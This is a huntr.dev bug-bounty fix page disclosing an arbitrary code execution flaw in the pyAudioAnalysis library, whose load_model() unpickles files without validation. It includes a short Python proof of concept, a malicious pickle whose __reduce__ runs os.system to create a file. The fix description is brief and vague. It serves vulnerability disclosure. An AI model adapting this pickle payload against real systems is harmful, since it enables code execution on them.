Security Fix for Arbitrary Code Execution - huntr.dev

[huntr-helper]

https://huntr.dev/users/d3m0n-r00t has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#2
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/other/pyAudioAnalysis/1/README.md

User Comments:

📊 Metadata *

Fixed Arbitrary code execution in pyAudioAnalysis

Bounty URL: https://www.huntr.dev/bounties/1-other-pyAudioAnalysis

⚙️ Description *

pyAudioAnalysis is an open Python library that provides a wide range of audio-related functionalities focusing on feature extraction, classification, segmentation and visualization issues. This package is vulnerable to Arbitrary Code Execution.

💻 Technical Description *

The function load_model() blindly loads a pickle file without any validation making it vulnerable to Arbitrary Code Execution. If the input pickle file is a malicious payload, create a file remotely.

🐛 Proof of Concept (PoC) *

import pickle
import os
from pyAudioAnalysis import audioTrainTest as aT

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ('touch HACKED', ))

payload = pickle.dumps(EvilPickle())

with open('MEANS', 'wb') as file:
    file.write(payload)

aT.load_model('')

🔥 Proof of Fix (PoF) *

For subprocess

👍 User Acceptance Testing (UAT)

Applied fix from pickle official fix as explained in here.
https://www.cmi.ac.in/~madhavan/courses/python-2014/docs/python-3.2.1-docs-html/library/pickle.html